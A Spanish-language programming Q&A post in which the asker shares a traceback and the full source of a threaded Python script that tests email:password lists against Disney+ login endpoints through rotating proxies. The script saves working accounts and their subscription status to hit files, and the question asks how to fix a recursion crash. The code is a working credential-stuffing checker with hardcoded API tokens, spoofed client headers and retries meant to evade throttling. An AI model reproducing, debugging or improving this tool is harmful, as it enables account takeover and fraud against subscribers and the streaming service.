# Error in python threading (Fatal Python error: _Py_CheckRecursiveCall: Cannot recover from stack overflow.)

Tags: python-3.x, hilos

Estoy haciendo un programa para logearme en Disney+, tengo un sistema de threading para que sea mas rápido, pero tengo un problema, y es que cuando dejo el programa un par de horas/minutos se cierra con el siguiente error:

> Fatal Python error: _Py_CheckRecursiveCall: Cannot recover from stack overflow.
> Python runtime state: initialized
> >Thread 0x00003780 (most recent call first):
> File "C:\Users\Business\AppData\Local\Programs\Python\Python39\lib\genericpath.py", line 19 in exists
> File "C:\Users\Business\AppData\Local\Programs\Python\Python39\lib\site-packages\requests\utils.py", line 249 in extract_zipped_paths
> File "C:\Users\Business\AppData\Local\Programs\Python\Python39\lib\site-packages\requests\adapters.py", line 225 in cert_verify
> File "C:\Users\Business\AppData\Local\Programs\Python\Python39\lib\site-packages\requests\adapters.py", line 417 in send
> File "C:\Users\Business\AppData\Local\Programs\Python\Python39\lib\site-packages\requests\sessions.py", line 645 in send
> File "C:\Users\Business\AppData\Local\Programs\Python\Python39\lib\site-packages\requests\sessions.py", line 529 in request
> File "C:\Users\Business\AppData\Local\Programs\Python\Python39\lib\site-packages\requests\sessions.py", line 577 in post
> File "C:\Users\Business\Desktop\carpetas\Netflix\Spectre.py", line 1460 in Disney
> File "C:\Users\Business\Desktop\carpetas\Netflix\Spectre.py", line 1597 in Disney
> File "C:\Users\Business\Desktop\carpetas\Netflix\Spectre.py", line 1597 in Disney
> File "C:\Users\Business\Desktop\carpetas\Netflix\Spectre.py", line 1597 in Disney
> File "C:\Users\Business\Desktop\carpetas\Netflix\Spectre.py", line 1597 in Disney
> File "C:\Users\Business\Desktop\carpetas\Netflix\Spectre.py", line 1597 in Disney
> File "C:\Users\Business\Desktop\carpetas\Netflix\Spectre.py", line 1597 in Disney
> File "C:\Users\Business\Desktop\carpetas\Netflix\Spectre.py", line 1597 in Disney
> File "C:\Users\Business\Desktop\carpetas\Netflix\Spectre.py", line 1597 in Disney
> File "C:\Users\Business\Desktop\carpetas\Netflix\Spectre.py", line 1597 in Disney
> File "C:\Users\Business\Desktop\carpetas\Netflix\Spectre.py", line 1597 in Disney
> File "C:\Users\Business\Desktop\carpetas\Netflix\Spectre.py", line 1597 in Disney
> File "C:\Users\Business\Desktop\carpetas\Netflix\Spectre.py", line 1597 in Disney
> File "C:\Users\Business\Desktop\carpetas\Netflix\Spectre.py", line 1597 in Disney
> File "C:\Users\Business\Desktop\carpetas\Netflix\Spectre.py", line 1597 in Disney
> File "C:\Users\Business\Desktop\carpetas\Netflix\Spectre.py", line 1597 in Disney
> File "C:\Users\Business\AppData\Local\Programs\Python\Python39\lib\threading.py", line 888 in run
> File "C:\Users\Business\AppData\Local\Programs\Python\Python39\lib\threading.py", line 950 in _bootstrap_inner
> File "C:\Users\Business\AppData\Local\Programs\Python\Python39\lib\threading.py", line 908 in _bootstrap

> Thread 0x000030b8 (most recent call first):
> File "C:\Users\Business\AppData\Local\Programs\Python\Python39\lib\ssl.py", line 1309 in do_handshake
> File "C:\Users\Business\AppData\Local\Programs\Python\Python39\lib\ssl.py", line 1040 in *create
> File "C:\Users\Business\AppData\Local\Programs\Python\Python39\lib\ssl.py", line 500 in wrap_socket
> File "C:\Users\Business\AppData\Local\Programs\Python\Python39\lib\site-packages\urllib3\util\ssl*.py", line 493 in *ssl_wrap_socket_impl
> File "C:\Users\Business\AppData\Local\Programs\Python\Python39\lib\site-packages\urllib3\util\ssl*.py", line 449 in ssl_wrap_socket
> File "C:\Users\Business\AppData\Local\Programs\Python\Python39\lib\site-packages\urllib3\connection.py", line 416 in connect
> File "C:\Users\Business\AppData\Local\Programs\Python\Python39\lib\site-packages\urllib3\connectionpool.py", line 1040 in _validate_conn
> File "C:\Users\Business\AppData\Local\Programs\Python\Python39\lib\site-packages\urllib3\connectionpool.py", line 386 in _make_request
> File "C:\Users\Business\AppData\Local\Programs\Python\Python39\lib\site-packages\urllib3\connectionpool.py", line 703 in urlopen
> File "C:\Users\Business\AppData\Local\Programs\Python\Python39\lib\site-packages\requests\adapters.py", line 440 in send
> File "C:\Users\Business\AppData\Local\Programs\Python\Python39\lib\site-packages\requests\sessions.py", line 645 in send
> File "C:\Users\Business\AppData\Local\Programs\Python\Python39\lib\site-packages\requests\sessions.py", line 529 in request
> File "C:\Users\Business\AppData\Local\Programs\Python\Python39\lib\site-packages\requests\sessions.py", line 577 in post
> File "C:\Users\Business\Desktop\carpetas\Netflix\Spectre.py", line 1460 in Disney
> File "C:\Users\Business\AppData\Local\Programs\Python\Python39\lib\threading.py", line 888 in run
> File "C:\Users\Business\AppData\Local\Programs\Python\Python39\lib\threading.py", line 950 in _bootstrap_inner
> File "C:\Users\Business\AppData\Local\Programs\Python\Python39\lib\threading.py", line 908 in _bootstrap

La función a la cual le estoy haciendo los multi-hilos es esta:

```
    def Disney(email, password, proxylist,retry):
        global hits, bads, checked, error, free, cpm
        sess = requests.Session()
        #PROXY = "11.456.448.110:8080"
        try:
            threads, proxy_type, retrys, timeout, ProxyGrabber, ProxyLink=load_params()
            if proxy_type == "http":
                scheme = "https"
            elif proxy_type == "socks4":
                scheme = "socks4"
            elif proxy_type == "socks5":
                scheme = "socks5"
            if not "null" in proxy_type:
                proxy = random.choice(proxylist)
                count = proxy.count(":")
                proxy_form = {'http': f"{scheme}://{proxy}", 'https': f"{scheme}://{proxy}"}
            else:
                pass
            url = "https://disney.api.edge.bamgrid.com/token"
            a = "ZGlzbmV5JmFuZHJvaWQmMS4wLjA.bkeb0m230uUhv8qrAXuNu39tbE_mD5EEhM_NAcohjyA"
            header = {
                "Host":"disney.api.edge.bamgrid.com",
                "accept":"application/json",
                "authorization":"Bearer "+a.replace('\r',''),
                "x-application-version":"google",
                "x-bamsdk-client-id":"disney-svod-3d9324fc",
                "x-bamsdk-platform":"android",
                "x-bamsdk-version":"6.1.1",
                "x-dss-edge-accept":"vnd.dss.edge+json; version=2",
                "x-bamsdk-transaction-id":"8697f44e-c576-40cc-b39c-7546ac295393",
                "user-agent":"BAMSDK/v6.1.1 (disney-svod-3d9324fc 1.17.1.0; v3.0/v6.1.0; android; tablet) HUAWEI BG2-W09 (BG2-W09C331B005; Linux; 6.0; API 23)",
                "content-type":"application/x-www-form-urlencoded",
                "content-length":"611",
                "accept-encoding":"gzip"
            }
            content = "grant_type=urn%3Aietf%3Aparams%3Aoauth%3Agrant-type%3Atoken-exchange&subject_token=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzUxMiJ9.eyJzdWIiOiI5NDAwMmYxMC1kMmNhLTQzNTctODNmNi05OThiMTM5MTI0OTQiLCJhdWQiOiJ1cm46YmFtdGVjaDpzZXJ2aWNlOnRva2VuIiwibmJmIjoxNjMyMTA1ODU5LCJpc3MiOiJ1cm46YmFtdGVjaDpzZXJ2aWNlOmRldmljZSIsImV4cCI6MjQ5NjEwNTg1OSwiaWF0IjoxNjMyMTA1ODU5LCJqdGkiOiI5MWRlNjVhOS02NmFlLTRlNDItYTc2My05NmZkYzYxODU3MjMifQ.gxRdx0jeVHKHd4R80tYghodKJQEhm7cO8XeFzuxxNQekXW4WvPFzMCymUG-OTySBiW0yKydE6Mhl0HOyK2vtOw&subject_token_type=urn%3Abamtech%3Aparams%3Aoauth%3Atoken-type%3Adevice&platform=android&latitude=52.368&longitude=4.9036"
            if not "null" in proxy_type:
                r1 = sess.post(url, headers=header, data=content, proxies=proxy_form)
            else:
                print("not null")
                r1 = sess.post(url, headers=header, data=content)
            if "forbidden" in r1.text:
                error+=1
                Disney(email, password, proxylist,retry)
            TK1 = r1.text[r1.text.find("{\"access_token\":\"")+len("{\"access_token\":\""):r1.text.rfind("\",\"token_type\":\"bearer")]
            url = "https://disney.api.edge.bamgrid.com/v1/public/graphql"
            content = {"operationName":"check","variables":{"email":email},"query":"query check($email: String!) { check(email: $email) { __typename operations nextOperation } }"}
            header = {
                "accept":"application/json",
                "accept-encoding":"gzip, deflate, br",
                "accept-language":"es-AR,es;q=0.9",
                "authorization": TK1.replace('\r',''),
                "content-length":"2992",
                "content-type":"application/json",
                "origin":"http://www.disneyplus.com",
                "referer":"http://www.disneyplus.com/",
                "sec-ch-ua":"\",Not;A Brand\";v=\"99\", \"Google Chrome\";v=\"97\", \"Chromium\";v=\"97\"",
                "sec-ch-ua-mobile":"?0",
                "sec-ch-ua-platform":"\"Windows\"",
                "sec-fetch-dest":"empty",
                "sec-fetch-mode":"cors",
                "sec-fetch-site":"cross-site",
                "user-agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36",
                "x-application-version":"1.1.2",
                "x-bamsdk-client-id":"disney-svod-3d9324fc",
                "x-bamsdk-platform":"windows",
                "x-bamsdk-platform-id":"browser",
                "x-bamsdk-version":"12.0",
                "x-dss-edge-accept":"vnd.dss.edge+json; version=2"
            }
            if not "null" in proxy_type:
                r2 = sess.post(url, headers=header, json=content, proxies=proxy_form)
            else:
                r2 = sess.post(url, headers=header, json=content)
    
            if "OTP" in r2.text:
                url = "https://disney.api.edge.bamgrid.com/v1/public/graphql"
                content = {"query":"    mutation login($input: LoginInput!) {        login(login: $input) {            account {                ...account                profiles {                    ...profile                }            }            actionGrant        }    }    fragment account on Account {    id    attributes {        blocks {            expiry            reason        }        consentPreferences {            dataElements {                name                value            }            purposes {                consentDate                firstTransactionDate                id                lastTransactionCollectionPointId                lastTransactionCollectionPointVersion                lastTransactionDate                name                status                totalTransactionCount                version            }        }        dssIdentityCreatedAt        email        emailVerified        lastSecurityFlaggedAt        locations {            manual {                country            }            purchase {                country                source            }            registration {                geoIp {                    country                }            }        }        securityFlagged        tags        taxId        userVerified    }    parentalControls {        isProfileCreationProtected    }    flows {        star {            isOnboarded        }    }}    fragment profile on Profile {    id    name    isAge21Verified    attributes {        avatar {            id            userSelected        }        isDefault        kidsModeEnabled        languagePreferences {            appLanguage            playbackLanguage            preferAudioDescription            preferSDH            subtitleAppearance {                backgroundColor                backgroundOpacity                description                font                size                textColor            }            subtitleLanguage            subtitlesEnabled        }        groupWatch {            enabled        }        parentalControls {            kidProofExitEnabled            isPinProtected        }        playbackSettings {            autoplay            backgroundVideo            prefer133            previewAudioOnHome            previewVideoOnHome        }    }    maturityRating {        ...maturityRating    }    flows {        star {            eligibleForOnboarding            isOnboarded        }    }}fragment maturityRating on MaturityRating {    ratingSystem    ratingSystemValues    contentMaturityRating    maxRatingSystemValue    isMaxContentMaturityRating}","variables":{"input":{"email":email,"password":password}}}
                if not "null" in proxy_type:
                    r3 = sess.post(url, headers=header, json=content, proxies=proxy_form)
                else:
                    r3 = sess.post(url, headers=header, json=content)
                if "{\"sdk\":{\"token\":{\"accessToken\":\"" in r3.text:
                    sd = r3.text[r3.text.find("sdk\":{\"token\":{\"accessToken\":\"")+len("sdk\":{\"token\":{\"accessToken\":\""):r3.text.rfind("\",\"accessTokenType\":\"AccountWithoutActiveProfile")]
                    REGION = r3.text[r3.text.find("geoIp\":{\"country\":\"")+len("geoIp\":{\"country\":\""):r3.text.rfind("\"}}},\"securityFlagged\":")]
                    url = "https://disney.api.edge.bamgrid.com/v2/subscribers"
                    header = {
                        "accept":"application/json; charset=utf-8",
                        "accept-encoding":"gzip, deflate, br",
                        "accept-language":"es-AR,es;q=0.9",
                        "authorization":"Bearer "+sd.replace('\r',''),
                        "content-type":"application/json; charset=utf-8",
                        "origin":"http://www.disneyplus.com",
                        "referer":"http://www.disneyplus.com/",
                        "sec-ch-ua":"\",Not;A Brand\";v=\"99\", \"Google Chrome\";v=\"97\", \"Chromium\";v=\"97\"",
                        "sec-ch-ua-mobile":"?0",
                        "sec-ch-ua-platform":"\"Windows\"",
                        "sec-fetch-dest":"empty",
                        "sec-fetch-mode":"cors",
                        "sec-fetch-site":"cross-site",
                        "user-agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36",
                        "x-application-version":"1.1.2",
                        "x-bamsdk-client-id":"disney-svod-3d9324fc",
                        "x-bamsdk-platform":"windows",
                        "x-bamsdk-version":"12.0",
                        "x-dss-edge-accept":"vnd.dss.edge+json; version=2"
                    }
                    if not "null" in proxy_type:
                        r4 = sess.get(url, headers=header, proxies=proxy_form)
                    else:
                        r4 = sess.get(url, headers=header)
                    SubStatus = r4.text[r4.text.find("subscriberStatus\":\"")+len("subscriberStatus\":\""):r4.text.rfind("\",")]
                    if "CHURNED" in SubStatus:
                        custom = "\033[1;33;40m[*] " + email + ":" + password + " | Country: " + REGION + " | Subscription Status: " + SubStatus + "\033[1;37;40m"
                        print(custom)
                        free+=1
                        checked+=1
                        cpm+=1
                        custom = email + ":" + password + " | Country: " + REGION + " | Subscription Status: " + SubStatus
                        open('results/Disney+/{}/Free.txt'.format(current_date), 'a+').write("{}\n".format(custom))
                    elif "ACTIVE" in SubStatus:
                        SubStatus = SubStatus[0:6]
                        good = "\033[1;32;40m[+] " + email + ":" + password + " | Country: " + REGION + " | Subscription Status: " + SubStatus + "\033[1;37;40m"
                        print(good)
                        hits+=1
                        checked+=1
                        cpm+=1
                        good = email + ":" + password + " | Country: " + REGION + " | Subscription Status: " + SubStatus
                        open('results/Disney+/{}/Hits.txt'.format(current_date), 'a+').write("{}\n".format(good))
                elif "upstream: 'identity'\\nReceived error response from upstream error with" in r3.text or "status '401' and description 'Bad " in r3.text:
                    if str(retry) == str(retrys):
                        fail = "\033[1;31;40m[-] " + email + ":" + password + "\033[1;37;40m"
                        print(fail)
                        checked+=1
                        cpm+=1
                        bads+=1
                    else:
                        retry+=1
                        Disney(email, password, proxylist,retry)
                elif "forbidden" in r3.text or "throttled" in r3.text:
                    error+=1
                    Disney(email, password, proxylist,retry)
                elif "access-token.invalid" in r3.text:
                    print("invalid auth?")
                    error+=1
                    Disney(email, password, proxylist,retry)
                else:
                    #print(r3.text)
                    error+=1
                    Disney(email, password, proxylist,retry)
            elif "Register" in r2.text:
                if str(retry) == str(retrys):
                    fail = "\033[1;31;40m[-] " + email + ":" + password + "\033[1;37;40m"
                    print(fail)
                    checked+=1
                    cpm+=1
                    bads+=1
                else:
                    retry+=1
                    Disney(email, password, proxylist,retry)
            elif "forbidden" in r2.text or "access-token.invalid" in r2.text or "throttled" in r2.text:
                error+=1
                Disney(email, password, proxylist,retry)
            else:
                #print(r2.text)
                error+=1
                Disney(email, password, proxylist,retry)
        except Exception as e:
            """f = open("log.txt", "w")
            f.write(str(e))"""
            open("log.txt", 'a+').write("{}\n".format(e))
            #f.close()
            #print(e)
            error+=1
            Disney(email, password, proxylist,retry)
```

Por las dudas la línea de código 1460 es esta:

```
r1 = sess.post(url, headers=header, data=content, proxies=proxy_form)
```

y la lina de codigo 1597 es la ultima que copie, donde termina la funcion (`Disney(email, password, proxylist,retry)`)

Comment: El propio error te lo está diciendo, a su manera: llamada recursiva, `Disney(email, password, proxylist,retry)` llama a la función que la contiene una y otra vez...

Comment: La llama cuando ocurre un error en las proxys para volver a intentarlo. Es por eso

Comment: Si te fijas bien, ese codigo esta en     except Exception as e:

Comment: La llama por lo menos 8 veces en el bloque `try` y una vez más en el `except`. ¿Qué puede salir mal...?

Comment: Hace ese llamado cuando hay un error en las proxys, como hago que se repita la funcion con las mismas variables que tiene en el momento sin que se cierre?